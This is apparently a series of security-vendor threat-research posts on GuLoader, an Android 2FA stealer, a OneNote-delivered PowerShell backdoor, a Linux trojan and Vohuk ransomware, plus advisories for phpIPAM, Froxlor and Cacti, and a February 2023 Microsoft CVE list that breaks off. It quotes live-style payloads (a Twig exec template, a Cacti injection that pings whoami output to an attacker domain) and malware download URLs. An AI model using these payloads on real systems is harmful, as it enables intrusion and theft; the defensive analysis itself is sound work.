Posts

New variant of the shellcode malware GuLoader spotted in the wild

/in /by

GuLoader malware is a well known shellcode based file less malware which downloads malicious payloads including AgentTesla, NetWire RAT and Ramcos RAT etc. The SonicWall RTDMI is detecting a surge of VBScript files for the past few weeks which downloads and executes GuLoader shellcode on the victim’s machine. The SonicWall Capture Labs Threat Research team observed that the malware was abusing Microsoft OneDrive in old variants,  but recently the malware is using Google Drive to host the shellcode and payloads. GuLoader uses advanced anti virtual machine, anti debug and anti scan techniques and when executed in controlled environment it displays an error window saying “This program cannot be run under virtual environment or debugging software!” However, we noticed that in some of the recent variants, this anti VM check is missing:

 

VBScript

The VBScript contains huge numbers of random unreferenced comments in between the useful code:

 

The VBScript looks more readable after removing the comments, however the obfuscation is still there to make it complex to understand. The obfuscation includes breaking strings into sub strings and using replace methods to bring the actual string. Additionally the malware echoes the sub string on the command prompt and reads the command prompt output to use in the code:

 

The VBScript runs the PowerShell executable by passing partially obfuscated PowerShell script as an argument:

 

PowerShell Script

The PowerShell script contains another obfuscated PowerShell script into a variable which is de-obfuscated using the function “Barb9”. The de-obfuscator function takes alternative bytes to get the actual PowerShell script:

I have simplified the obfuscated PowerShell script by replacing the variables with their actual values, to make it more readable. The malware downloads the shellcode from URL h[t][t]ps://drive.google.com/uc?export=download&id=1LXM8SwbzycAJ3nYKg_etC8h7htXwbA1L into “%appdata%\Dusinelab.dat”. The malware allocates 0x290 bytes with memory protection PAGE_EXECUTE_READWRITE and  0x496A000 bytes with memory protection PAGE_READWRITE. The malware reads bytes from “%appdata%\Dusinelab.dat” and write initial 656 bytes into memory protection with PAGE_EXECUTE_READWRITE and writes the remaining bytes into memory protection with PAGE_READWRITE into PowerShell executable. The malware now calls the injected 656 bytes and provides the other injected bytes address as argument:

 

GuLoader

The initial 656 bytes decrypts the GuLoader shellcode using a dword xor operation and jumps to the decrypted shellcode:

 

The GuLoader downloads malware payload on the victim’s machine. For recent variants, we have observed that AgentTesla and Remcos are the mostly downloaded malware families. Please refer the previous blog for detailed analysis of GuLoader malware.

 

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

IOCs

SHA256

21f85e773baf3a560f6b3427d8d38b3d4de5541f164ebeeaa38468da4c2f9a94

611e7d0afada21e2a465b30e13aede7d2b6d1f2cd1ac26a71a02930d40e2c29e

643852461ba8d7449b2c7450da2596fba8d373970f4fd7e4ef6ca1fbe1512dc5

f65e2aa00d4545b6b5fdd83b0a30fbdc034f7a0c83a07b5333fe5eb067326fd3

8b7f4172f7c3d3b46b4a71ea0b23d247ec1d2d6b30c3ec3ca1662f759fda29b0

132fc59bcc0d0cdb4cef650e12eefae3d145f6d3adf4bea415586ab79d3af9c3

3bf702bc7bf2ff4c9688b572fbf657112d7c6e6adc76f1ca2ff8247a6e304497

1e48117668fe42d9176a858ddef213a79f3076e329649333ca8cb5eaf5c275d8

645e0b29d2837e88dbfa6587e8fa5bfff5eecb99cadf5d901878218a787462db

URLs

h[t][t]ps://doc-0k-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vrmukpm7tvt2j7738snc3v0cohe67va9/1677229950000/06572420727011628371/*/1m2ctuhfbOBzf1gG96AlOhKcbS2H5Ac7w?e=download&uuid=1940b6c5-394e-4c09-8556-2b5d432c1b1d

h[t][t]ps://doc-0c-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d2r5a97024hfm4j4pdodbf3beuq384m2/1677230400000/06572420727011628371/*/1NzytUjiVG8AMJeNohf2eezLqKf1IWQ9-?e=download&uuid=16e28d5d-c8d1-40ba-9177-83f545bc7c1e

h[t][t]ps://doc-00-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5u3mgffiecsahel0bcunriplovkdot0h/1677230850000/06572420727011628371/*/1kcr-LKYBerRyz8B7eAVhJdOVPA8xbnMS?e=download&uuid=c6ad6c02-e526-4214-9c71-68e5052502ee

h[t][t]ps://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hcuh9mc2j7s63soug29ndv9f26lu9qlf/1677229950000/06572420727011628371/*/17fj1v55rWAtqLXAWTgJdz2RqR0jP-S16?e=download&uuid=35d6c436-8af0-4cdf-9d1f-08c929e441f1

h[t][t]ps://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fq6mvpsp92abhso57r5k6op3v7cugp30/1677230400000/06572420727011628371/*/1CdjMnL48Xz9FwOzfurMxeyrgneri_XKi?e=download&uuid=9047df03-eb8e-4aad-bb72-b4f4caaf8596

h[t][t]ps://doc-14-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nuoa7rgck742l591f6tutf250p4224m1/1677230850000/06572420727011628371/*/1sA7SxGclXm4jxTp_t_4rKeKNp1qKtySG?e=download&uuid=ffbbf05b-c173-47be-a8fe-74fc4401744b

 

phpIPAM SQL Injection Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  phpIPAM is a free and open-source web-based IP address management (IPAM) software application. It is designed to help organizations efficiently manage their IP addresses and network infrastructure. The software is built using PHP and a MySQL database and can be accessed through any modern web browser.

  With phpIPAM, users can create, manage and organize IP address spaces, subnets, VLANs, and devices. It also provides features such as IP address tracking, advanced search options, and a comprehensive API for integration with other systems. Additionally, phpIPAM offers advanced features like LDAP and Active Directory integration, IPv6 support, VLAN management, and SNMP integration.

  This vulnerability allows authenticated admins to perform SQL injection. A successful attack may result from the selection of entire tables and, in certain cases, the attacker gaining administrative rights to a database, writing files to the server leading to Remote Code Execution, XXS Stored, or writing a script to extract data.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-1211.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.2 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 7.2(AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is high.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  SQL injection is a common vulnerability in web applications that allows attackers to execute arbitrary SQL commands on the server. One such instance is when updating custom fields in the admin panel. Malicious web admins can exploit this vulnerability by using the POST method with the /app/admin/custom-fields/edit-result.php endpoint and passing parameters such as fieldType and fieldSize. By inserting SQL commands into these parameters, the attacker can execute them on the server.

  In the example below, the attacker uses the SELECT sleep(3); command to delay the server response by 3 seconds. This may seem like a harmless attack, but attackers can use this technique to cause more serious damage. For instance, they can inject arbitrary SQL commands or even operating system commands using the system command in SQL. This can allow the attacker to gain access to sensitive data, modify or delete data, or even take control of the entire server.

  To prevent SQL injection attacks, web developers must take appropriate measures such as validating user input, using prepared statements or parameterized queries, and implementing strict input sanitization. In addition, web admins should regularly update their web application frameworks, libraries, and plugins to ensure they are using the latest security patches. Properly securing web applications is critical to protecting sensitive data and ensuring the integrity of the entire system.

Triggering the Problem:

  • The attacker must have network access to the target server.
  • The target must be running a vulnerable version of the software.
  • The target server must have admin privileges.

Triggering Conditions:

  The attacker sends a POST Request with a malicious “fieldSize” parameter. The vulnerability is triggered when the server processes the request. This vulnerability allows authenticated admins to perform SQL injection.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • SSL/TLS (HTTPS)
  Example POST Request Packet:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 18920 PhpIPAM SQL Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Android malware steals your Google Authenticator codes

/in /by

SonicWall Capture Labs Threat Research team came across a malware campaign that steals device information, card information, and google authenticator code on Android devices. This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their device. This malicious app may use the following icons:

Fig 1: Malware using famous app icons

 

We also noticed that most of these malicious apps are fairly new and have recently been submitted over malware sharing platforms like Virus Total.

Fig 2: Latest sample found on VT

 

Infection cycle

The critical permissions used in these apps are mentioned below:

  • READ_SMS
  • READ_CALL_LOG
  • READ_CONTACTS
  • READ_EXTERNAL_STORAGE
  • WRITE_EXTERNAL_STORAGE
  • CAMERA
  • RECORD_AUDIO
  • ACCESS_FINE_LOCATION
  • REQUEST_INSTALL_PACKAGES
  • CALL_PHONE

After installation, it asks the victim to enable the accessibility service. Once this option is enabled it becomes difficult to uninstall the application from the device.

Fig 3: Installed malicious app

 

Fig 4: Accessibility permission

 

The malicious application connects to the Command-and-Control server and receives commands to execute operations accordingly, as shown in the image below:

Fig 5: C&C server

 

In web data, it creates a database where it stores the victim’s personal information and card details.

Fig 6: Database created for storing information

 

Google Authenticator generates two-factor authentication (2FA), which provides stronger security for Accounts & requires a second step of verification when a user signs in. This malware manages to evade additional layers of security by getting 2FA codes with the help of Accessibility services.

Fig 7: Stealing Google authenticator code

 

This malware also sends details of current location of the victim to its remote C&C server.

Fig 8: Latest location info

This malware is also capable of taking screenshots of the victim’s device and sending them to the C&C server.


Fig 9: Malware capture screenshots

 

It stores C&C server’s details like Host address (192.168.110.93) and port number (33660) in base64 encoded form.

Fig 10: Network connection

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicators of Compromise (IOC):

0ef96f5ce66266f55d4e17f9985c4c929633a972e587ced8b000b3910ffb3303

115ee615a45d4645e805da20ba3ccb26c7383cc52f3df16506b522ca3a009235

46a3badfa5682d2d862618933155fa04cc64690d5588ea06089670e222ba36b4

72db4117f73c566a8a98fe27d00dc645e319a98217fa7fc5992138e70af8574a

7e5d28e9663fc6d2c5badc7a660058e2bf69b410791f01709177590c65944db1

ca310362727d0416ce6ec24a90409ad2c8d9cdaf95f6236a759ac31eb2a8cb0f

cea371b7bdd44271b20194248431c45f03bd66c4b7f7abad8404ca611a27565c

f815b1c1b51810bd331eb75d30fabbbad2237011c8cd242c5655bfca304c978a

46a3badfa5682d2d862618933155fa04cc64690d5588ea06089670e222ba36b4

OneNote files are being used to deliver fileless backdoor

/in /by

The SonicWall Capture Labs Research team is keeping an eye on malicious OneNote files since the last few weeks which are involved in delivering prevalent malware families including AgentTesla, AsyncRat and QakBot.  OneNote files are not commonly used by cybercriminals until recently. This is evident by the fact that SonicWall RTDMI detected this malicious OneNote file while it was missed by other security providers available on popular threat intelligence sharing portals at the time of analysis:

 

In previous variants, the malware was carrying the payloads with the OneNote file and hiding them behind an image. The victim is enforced using the image content, to click on the image which triggers the payload execution. But recently we have seen that instead of attaching payload in the OneNote files, the malware author putting an URL pointing to the payload. This change is made to stay undetected from the security vendors because the security vendors can trigger the detection based on the attached payload files. The OneNote file has no subject line and contains a hyperlink for a short URL “h[t][t]ps://rb.gy/zggy57” which says “Download from cloud”:

 

The short URL directs the request to h[t][t]p://myccc1.ddnsgeek.com/files/SCAN26022023.docs.zip which downloads an archive file:

 

The archive file contains a Windows Shortcut file (LNK) file which downloads and executes a batch script from an URL “http://myccc1.ddnsgeek.com/sched.php” to “%tmp%\1.cmd” using Client for URL (cURL) utility:

 

The batch script file registers a schedule task “wXlOKhHBDX” which runs every 2 minutes and deletes itself. The scheduled tasks executes a PowerShell script to further invoke a web hosted PowerShell script:

 

Backdoor

The PowerShell script is hosted on a URL “h[t][t]p://myccc1.ddnsgeek.com/rev.php” which is a backdoor which is obfuscated by aliasing the cmdlet with random names:

 

After replacing the random alias names with actual cmdlets and formatting the PowerShell script, it becomes readable. The script contains a function which accepts two argument a remote host URL and a port number. The PowerShell scripts executes in a while loop every 3 seconds and try to connect the remote host “myccc1.ddnsgeek.com” on port number “8448”, until the connection is established. The malware sends the username of the victim’s machine to the remote host and receives a PowerShell script. The malware executes the received PowerShell script, sends back the return value and waits for the next commands. At the time of analysis the remote host was sending a “echo <random_string>” which makes us an impression that either the malware author has identified the controlled environment execution or it has suspended it malicious activity for a while:

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

A multifunction trojan targeting Linux hosts has been seen in the wild

/in /by

This week, the Sonicwall Capture Labs Research team analyzed a Trojan downloader targeting Linux environments. This Trojan has been around since 2019, but has not been active in the past year until recently. It uses legitimate linux tools in its infection cycle and other noble tricks like utilizing Tor proxies, DNS over HTTPs for resolving websites it visits, which all help mask its malicious behavior.

Infection cycle:

The sample we analyzed is a base64 encoded bash script. Decoding the script revealed a multi-function Trojan.

It has a function called “kurl” that uses bash script to perform an HTTP request to download its initial components.

Using this kurl() function, it downloads legitimate linux tools such as ps, ss and curl (different from its own function named kurl with a “k”). This is done in case the more common curl utility is not yet present in the victim’s machine. However, once installed and downloaded, it proceeds to use curl for the rest of the infection cycle.

A function named “sockz”  uses DNS over HTTPs to resolve the IP address for the web address “relay.tor2socks.in” by querying the domains defined in the variable “n.”

  • dns.twnic.tw
  • doh-ch.blahdns.com
  • doh-de.blahdns.com
  • oh-fi.blahdns.com
  • doh-jp.blahdns.com
  • doh.li doh.pub
  • doh-sg.blahdns.com
  • fi.doh.dns.snopyta.org
  • hydra.plan9-ns1.com

DNS over HTTPs was introduced to prevent malicious attackers from monitoring a potential victim’s browsing habits by snooping DNS traffic. Since traditional DNS lookup traffic can be seen in plain text, HTTPs provides encryption and prevents that. However, in this case, it helps prevent the victim or any system administator looking at an infected machine from identifying whether a traffic is malicious or not.

It then uses the function u() to send the system information of the victim machine including it’s IP, hostname, machine name and even the current crontab to a Tor website that is currently down. It is also supposed to download another component from the same dot onion website.

Further research, we found similar malware analysis for the same Trojan dating back to 2019 with the latest being 2021 which leads us to believe that we might see more iterations of this Trojan this year.

 

SonicWall Capture Labs provides protection against this threat via following signature:

  • GAV: Malagent.CTR  (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

 

Froxlor 2.0.6 RCE Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Froxlor is a web-based server management panel that allows users to easily manage multiple web hosting accounts on a single server. It is designed to simplify the management of web hosting services for both administrators and end-users. Froxlor provides a simple and intuitive web interface that allows administrators to manage multiple hosting accounts, domains, email accounts, FTP accounts, databases, and more. It also offers a wide range of features such as domain name management, DNS zone management, PHP configuration, SSL certificate management, and more.

  The main benefit of using Froxlor is that it simplifies server administration, making it easier to manage multiple web hosting accounts on a single server. This can save time and reduce the risk of errors when managing web hosting services. Froxlor is open-source software and is available for free under the GNU General Public License. It can be installed on most Linux distributions and is compatible with Apache, Nginx, and Lighttpd web servers.

  A remote code execution vulnerability has been reported for Froxlor 2.0.6. This vulnerability is due to an Arbitrary File Write and Server Side Template Injection.

  Successfully exploiting this vulnerability could result in an authenticated attacker achieving a full remote command execution on OS level under the web server user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0315.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.9 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof-of-concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  By exploiting an arbitrary file write vulnerability within Froxlor’s logging feature, an attacker can point the log file to any writable path on the system. This includes paths within the web server’s document root, which can lead to the overwriting of existing twig templates located under the default “templates/Froxlor/” path.

  When the logging feature is enabled on the server, the attacker can use it to log specific actions to the log file. For example, if an admin user changes their theme, the attacker can log this action and then change the theme name to a custom twig template. This malicious template will be written to an existing twig template file, such as footer.html.twig.

  One of the malicious twig templates that an attacker could use is {{[‘id’]|filter(‘exec’)}}. When this template is executed, it calls the function exec() and passes the value “id” to it. This allows the attacker to execute arbitrary commands on the server and potentially gain further access to the system.

Triggering the Problem:

  • The attacker must have network access to the target server.
  • The target must be running a vulnerable version of the software.
  • The target server must have the logging feature enabled.

Triggering Conditions:

  The attacker authenticates and sends a crafted post request to the target server. By exploiting an arbitrary file write vulnerability, the attacker gains the ability to redirect the server’s log file to a writable path. With this new access, the attacker can then proceed to overwrite an existing twig template with a malicious one of their own design. The vulnerability is triggered when the server validates the request and executes the custom twig template, which allows the attacker to execute their malicious code and potentially gain further access to the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • SSL/TLS (HTTPS)

  Example Attack Packet:

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 15836 Froxlor Remote Command Execution

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Cacti Command Injection Vulnerability

/in /by

Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Cacti Command Injection Vulnerability | CVE-2022-46169
The command injection vulnerability exists in the remote_agent.php file.

As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling “action” that is defined in the database. In Cacti, users can define actions to monitor a single host or “poller.” One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.

Here are some examples of exploits:


“poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun”  This is attempting to inject a command into the poller_id parameter by appending a command using a semicolon (;) followed by a command to ping a domain that is controlled by the attacker. The command is also using command substitution to execute the whoami command and insert the output into the command being executed. The purpose of this command is to send a ping request to a domain controlled by the attacker that includes the result of the whoami command in the URL, which could be used to identify the username of the user running the Cacti remote agent script.

 

The part of the request touch+%2Ftmp%2FTMSR is an attempt to execute a shell command on the server, which is to create a file named TMSR in the /tmp/ directory using the touch command. This request is malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15808:Cacti remote_agent Command Injection

Cacti has patched this vulnerability.

Threat Graph

Vohuk Ransomware uses Cipher.exe making files recovery impossible

/in /by

Recently, the SonicWall Capture Labs Research team analyzed a ransomware called Vohuk. Which uses the genuine Windows tool Cipher.exe to overwrite the deleted files which make the recovery of the files impossible.

Cipher.exe is a command-line tool that can be used to manage encrypted data by using the Encrypting File System (EFS).Whenever any files or folder is deleted the data is not deleted, only the space on the disk that was occupied by the deleted data is deallocated. Until the space is overwritten, there is a possibility that the deleted data can be recovered using a low-level disk editor or data-recovery software. Administrators uses the Cipher.exe to encrypt and decrypt data on drives that use the NTFS file system. In Encrypting process windows makes a backup copy of the file. So the data isn’t lost if an error occurs during the encryption process. After the encryption is complete, the backup copy is deleted. As with other deleted files, the data isn’t removed until it has been overwritten. So to prevent unauthorized recovery of such data windows has provided the tool called Cipher.exe.

Ransomware uses this feature of Cipher.exe to overwrite the deleted data so as to make the recovery of the files impossible.

Infection Cycle:

At the start of the execution it creates a named mutex “Global\\VohukMutes” to avoid different instance of Vohuk Ransomware running on the same system.

It creates a folder on root drive C:\\ProgramData\\Vohuk at below location and copies itself as App.exe and also creates a Log file which is used for logging it’s activities.

At the start of the Log.txt file it mentions the Name as VohukCrypter V1.51 and its version number.

The Ransomware collects the command-line options if any passed at the time of execution. It checks for the following string options in the command line parameter and depending upon the parameter provided it may change its behaviour.

‘/NOKILL’
‘/NOMOUNT’
‘/NOEMPTY’
‘/LAN’
‘/NOLOCAL’
‘/NONETDRIVE’
‘/NOSTARTUP’
‘/FULL’
‘/FAST’
‘/PATH=’

Ransomware calls the GetSystemInfo API and gets the Number of processor presents on the system

The number of threads created is dependent on the number of processors, with one thread being created for each processor.
If the number of processors are more than 64 then maximum thread created by the Ransomware is 64 threads.

Before encrypting the files it first empties the files present from all Recycle Bins on all drives.

It launches the command prompt process and Vssadmin command is passed to the command prompt to delete the volume shadow copies.

Ransomware kills the below running process if found running on the system. So that it is able to encrypt the files which are currently in use.

It also enumerates the services and kills below listed services and also its dependent services if found running on the system.

The Ransomware use multi-threading by using APIs CreateIoCompletionPort(), PostQueuedCompletionStatus(), GetQueuedCompletionPort() to handle multiple files concurrently and thread priority is also set to high for quick encryption.

Ransomware avoids encrypting the files with below filename.

And it also avoids encrypting the files with below extension; so that the common functioning of the Operating system is not hampered.

Ransomware checks the file attributes before encryption, if the attribute is READ_ONLY then it resets the READ_ONLY attribute.

It encrypts the files, renames them and adds the extension “.Vohuk” and drops a ransom note file named R3ADM3.txt,in each folder.

Once all the encryption process is completed it uses genuine Windows tool Cipher.exe on all drives to overwrite the deleted data.

The ransomware also replaces the desktop wallpaper with its own.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: VohukCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for February 2023

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21529 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 3520: Microsoft Exchange Server Remote Code Execution (CVE-2023-21529)

CVE-2023-21688 NT OS Kernel Elevation of Privilege Vulnerability
ASPY 403: Malicious-exe exe.MP_297

CVE-2023-21689 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 404: Malicious-exe exe.MP_298

CVE-2023-21690 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 405: Malicious-exe exe.MP_299

CVE-2023-21692 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 406: Malicious-exe exe.MP_300

CVE-2023-21706 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15834: Microsoft Exchange Server Remote Code Execution (CVE-2023-21706)

CVE-2023-21715 Microsoft Office Security Feature Bypass Vulnerability
ASPY 410: Malformed-File pub.MP.6

CVE-2023-21812 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 409: Malicious-exe exe.MP_303

CVE-2023-21823 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 408: Malicious-exe exe.MP_302

CVE-2023-23376 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 407: Malicious-exe exe.MP_301

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21528 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21553 Azure DevOps Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21564 Azure DevOps Server Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21566 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21567 Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21568 Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21570 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21571 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21572 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21573 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21684 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21685 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21686 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21687 HTTP.sys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21691 Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21693 Microsoft PostScript Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21694 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21695 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21697 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21699 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21700 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21701 Microsoft Protected Extensible Authentication Protocol (PEAP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21702 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21703 Azure Data Box Gateway Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21704 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21705 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21707 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21710 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21713 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21714 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21716 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21717 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21718 Microsoft SQL ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21721 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21722 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21777 Azure App Service on Azure Stack Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21778 Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21797 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21798 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21799 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21800 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21801 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21802 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21803 Windows iSCSI Discovery Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21804 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21805 Windows MSHTML Platform Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21806 Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21807 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21808 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21809 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-21811 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21813 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21815 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21816 Windows Active Directory Domain Services API Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21817 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21818 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21819 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21820 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21822 Windows Graphics Component Elevation of Privilege Vulnerability
